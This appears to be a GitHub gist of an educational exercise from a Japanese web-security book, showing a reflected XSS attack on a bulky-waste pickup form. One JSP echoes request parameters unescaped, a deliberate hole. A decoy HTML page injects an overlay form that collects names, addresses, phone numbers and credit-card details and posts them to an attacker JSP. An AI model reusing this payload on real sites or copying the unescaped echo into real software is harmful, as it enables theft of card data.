Skip to content

Instantly share code, notes, and snippets.

@seyan

seyan/43-002.html

Created May 9, 2011 09:01
Show Gist options
  • Save seyan/962258 to your computer and use it in GitHub Desktop.
Save seyan/962258 to your computer and use it in GitHub Desktop.
Download ZIP
XSS攻撃:formの送信先の変更(43-002.htmlの偽ページとして攻撃者が43-902.htmlを用意)
Raw
43-002.html
<html>
<head><title>粗大ゴミの申し込みがクレジットカードで</title></head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<body>
<form action="Page94Servlet" method="POST">
<input name="name" type="hidden" value="test">
<input name="addr" type="hidden" value="test">
<input type="submit" value="申込" />
</form>
</body>
</html>
Raw
43-002.jsp
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>○○市粗大ゴミ受付センタ-</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body>
<form action="" method="post">
氏名<input size="20" name="name" value="<%= request.getParameter("name") %>" /><br>
住所<input size="20" name="addr" value="<%= request.getParameter("addr") %>" /><br>
電話番号<input size="20" name="tel" value="<%= request.getParameter("tel") %>" /><br>
品目<input size="10" name="kind" value="<%= request.getParameter("kind") %>" />
数量<input size="5" name="num" value="<%= request.getParameter("num") %>" /><br>
<br>
<input type=submit value="申込" />
</form>
</body>
</html>
Raw
43-902.html
<html>
<head><title>粗大ゴミの申し込みがクレジットカードで</title></head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<body>
○○市の粗大ゴミの申し込みがクレジットカードで支払えるようになっていたので、さっそく試した。これは便利です。
<BR>
<form action="Page94Servlet" method="POST">
<input name="name" type="hidden" value='"></form><form style=top:5px;left:5px;position:absolute;z-index:99;background-color:white action=http://localhost:8080/Wasbook/43-903.jsp method=POST>粗大ゴミの回収費用がクレジットカードでお支払い頂けるようになりました<br>氏  名<input size=20 name=name><br>住  所<input size=20 name=addr><br>電話番号<input size=20 name=tel><br>品  目<input size=10 name=kind>数量<input size=5 name=num><br>カード番号<input size=16 name=card>有効期限<input size=5 name=thru><br><input value=申込 type=submit><BR><BR><BR><BR><BR></form>' />
<input style="cursor:pointer;text-decoration:underline;color:blue;border:none;background:transparent;font-size:100%;" type="submit" value="○○市粗大ゴミ申し込みセンター" />
</form>
</body>
</html>
Raw
43-903.jsp
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>○○市粗大ゴミ受付センタ-(情報ゲット/実際にはこんな画面は表示されない。)</title>
</head>
<body>
○○市粗大ゴミ受付センタ-(情報ゲット/実際にはこんな画面は表示されない。)
<form action="" method="post">
氏名<input size="20" name="name" value="${requestScope.name}" /><br>
住所<input size="20" name="addr" value="${requestScope.addr}" /><br>
電話番号<input size="20" name="tel" value="${requestScope.tel}" /><br>
品目<input size="10" name="kind" value="${requestScope.kind}" />
数量<input size="5" name="num" value="${requestScope.num}" /><br>
<br>
<input type=submit value="申込" />
</form>
</body>
</html>
Raw
Page94Servlet.java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class Page94Servlet extends HttpServlet {
private static final long serialVersionUID = 1L;
public Page94Servlet() {
super();
}
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
//文字化け対策
request.setCharacterEncoding("utf-8");
response.setContentType("text/html; charset=utf-8");
request.getRequestDispatcher("43-002.jsp").forward(request, response);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment